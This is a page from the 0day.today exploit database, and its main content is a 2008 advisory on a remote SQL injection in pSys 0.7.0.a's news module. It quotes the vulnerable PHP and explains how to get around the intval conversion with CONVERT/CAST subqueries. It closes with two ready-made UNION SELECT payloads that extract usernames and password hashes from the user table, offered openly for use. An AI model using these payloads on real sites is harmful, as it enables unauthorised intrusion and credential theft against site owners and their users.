0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability

Author

n/a

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-3123

Category

web applications

Date add

04-06-2008

Platform

unsorted

==========================================================
pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability
==========================================================




######################
#
#pSys - 0.7.0. alpha shownews SQL Injection
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#Bug in here:
#
# if (isset($_REQUEST['shownews']) && $_REQUEST['shownews'] != "") {
#    $sqlbefehl="Select titel from $tab_news Where id = '".intval($_REQUEST['shownews'])."'";
#    $gettitel = mysql_query($sqlbefehl,$serverid);
#    $news=mysql_fetch_array($gettitel);
#    $pagetitle = $pset['systitle']." - ".htmlspecialchars($news['titel']);
#    //Hit Count
#    $sqlbefehl = "Update $tab_news Set Counter=Counter+1 Where id = '".intval($_REQUEST['shownews'])."'";
#    @mysql_query($sqlbefehl,$serverid);
# }
#
#
#Ok, as we can see the script uses intval to convert the value of $shownews to an integer,
#so a normal Select Injection would return nothing.
#But it is still possible to inject and echo the right values using a simple CONVERT() or CAST() subquery.
#Make sure that your subquery returns only one row by setting limit n,1.
#
#In standard configuration the table prefix is "ps_". But it also can be somethin like "powie_"
#like it is set in version 0.69.
#Remember that you can use information_schema.tables when mySQL Version >= 5 for finding prefixes and names.
#
#And by the way Powie uses a nice password encryption style, so have fun with it:
#
# if ($checkuser == 1) {
#         srand((double)microtime() * 1000000);
#         $newpass = md5(uniqid(rand()));
#         $pwd = substr($newpass, 0, 10);
# }
#
#SQL Injection:
#http://[target]/[path]/news/index.php?shownews=[SQL+SUBQUERY]
#
#PoC:
#/news/index.php?shownews=-1'UnIoN/**/SeLeCt/**/1,CoNvErT((SeLeCt/**/CoNcAt(username,0x3a,pwd)/**/FrOm/**/powie_pfuser/**/LiMit/**/0,1),ChAr(99)),3,4,5,6,7,8,9,10,11,12,13/*
#/news/index.php?shownews=-1'UnIoN/**/SeLeCt/**/1,CaSt((SeLeCt/**/CoNcAt(username,0x3a,pwd)/**/FrOm/**/ps_pfuser/**/LiMit/**/0,1)/**/AS/**/ChAr),3,4,5,6,7,8,9,10,11,12,13/*
#
#######################
#######################



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability

Report Error

Report Error